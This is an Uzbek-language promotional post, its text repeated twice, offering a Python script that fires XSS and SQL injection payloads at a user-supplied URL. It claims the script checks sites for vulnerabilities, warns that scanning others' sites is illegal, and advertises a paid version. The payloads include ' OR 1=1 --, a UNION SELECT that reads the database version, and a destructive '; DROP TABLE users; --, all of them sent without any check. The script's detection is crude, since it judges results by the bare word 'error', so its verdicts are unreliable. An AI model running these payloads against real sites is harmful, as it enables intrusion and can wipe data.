🛡 Veb-saytingizni XSS va SQL Injection zaifliklariga tekshiring !
Sizning veb-saytingiz hackerlar uchun oson nishon emasligiga aminmisiz? 🤔
Quyidagi Python skripti saytni XSS (Cross-Site Scripting) va SQL Injection zaifliklariga avtomatik ravishda tekshiradi !
⚙️ Kod qanday ishlaydi?
🔹 Saytga zararli XSS va SQL Injection kodlarini yuboradi.
🔹 Saytdan kelgan javobni tekshiradi.
🔹 Agar saytda zaiflik bo‘lsa, "❌ Topildi", himoyalangan bo‘lsa, "✅ Himoyalangan" deb chiqaradi.
🚀 Dastur kodi:
import requests
# Foydalanuvchidan URL kiritishni so'rash
target_url = input("🔗 Test qilinadigan sayt URL'ini kiriting (masalan, http://example.com/search.php?q=): ")
# XSS va SQL Injection payloadlari
xss_payloads = [
"alert('XSS')",
"\" onerror=\"alert('XSS')",
"",
"'; alert('XSS');'"
]
sql_payloads = [
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM users) > 0 --",
"' OR '1'='1' --",
"'; DROP TABLE users; --"
]
def test_xss():
print("\n[🔎] XSS zaifligini test qilish...")
for payload in xss_payloads:
response = requests.get(target_url + payload)
if payload in response.text:
print(f"[❌] XSS topildi: {payload}")
else:
print(f"[✅] XSS himoyalangan: {payload}")
def test_sql_injection():
print("\n[🔎] SQL Injection zaifligini test qilish...")
for payload in sql_payloads:
response = requests.get(target_url + payload)
if "error" in response.text.lower() or "syntax" in response.text.lower():
print(f"[❌] SQL Injection topildi: {payload}")
else:
print(f"[✅] SQL Injection himoyalangan: {payload}")
if __name__ == "__main__":
test_xss()
test_sql_injection()
🔥 Foydasi qanday ?
✅ Veb-saytingizni zaifliklarga tekshirib, hackerlar oldidan himoya qilishingiz mumkin!
✅ Bu vosita bepul va ochiq kodli!
⚠️ Muhim eslatma !
❌ Boshqalarning saytlarini ruxsatsiz skanerlash NOQONUNIY!
✅ Faqat o‘z saytingizni tekshirish uchun ishlating!
💰 Premium versiya + Qo‘llab-quvvatlash → Kontaktga yozing 📩
👉 O‘z saytingizni himoya qiling va xavfsiz bo‘ling! 🔥
Sizning veb-saytingiz hackerlar uchun oson nishon emasligiga aminmisiz? 🤔
Quyidagi Python skripti saytni XSS (Cross-Site Scripting) va SQL Injection zaifliklariga avtomatik ravishda tekshiradi !
⚙️ Kod qanday ishlaydi?
🔹 Saytga zararli XSS va SQL Injection kodlarini yuboradi.
🔹 Saytdan kelgan javobni tekshiradi.
🔹 Agar saytda zaiflik bo‘lsa, "❌ Topildi", himoyalangan bo‘lsa, "✅ Himoyalangan" deb chiqaradi.
🚀 Dastur kodi:
import requests
# Foydalanuvchidan URL kiritishni so'rash
target_url = input("🔗 Test qilinadigan sayt URL'ini kiriting (masalan, http://example.com/search.php?q=): ")
# XSS va SQL Injection payloadlari
xss_payloads = [
"alert('XSS')",
"\" onerror=\"alert('XSS')",
"",
"'; alert('XSS');'"
]
sql_payloads = [
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM users) > 0 --",
"' OR '1'='1' --",
"'; DROP TABLE users; --"
]
def test_xss():
print("\n[🔎] XSS zaifligini test qilish...")
for payload in xss_payloads:
response = requests.get(target_url + payload)
if payload in response.text:
print(f"[❌] XSS topildi: {payload}")
else:
print(f"[✅] XSS himoyalangan: {payload}")
def test_sql_injection():
print("\n[🔎] SQL Injection zaifligini test qilish...")
for payload in sql_payloads:
response = requests.get(target_url + payload)
if "error" in response.text.lower() or "syntax" in response.text.lower():
print(f"[❌] SQL Injection topildi: {payload}")
else:
print(f"[✅] SQL Injection himoyalangan: {payload}")
if __name__ == "__main__":
test_xss()
test_sql_injection()
🔥 Foydasi qanday ?
✅ Veb-saytingizni zaifliklarga tekshirib, hackerlar oldidan himoya qilishingiz mumkin!
✅ Bu vosita bepul va ochiq kodli!
⚠️ Muhim eslatma !
❌ Boshqalarning saytlarini ruxsatsiz skanerlash NOQONUNIY!
✅ Faqat o‘z saytingizni tekshirish uchun ishlating!
💰 Premium versiya + Qo‘llab-quvvatlash → Kontaktga yozing 📩
👉 O‘z saytingizni himoya qiling va xavfsiz bo‘ling! 🔥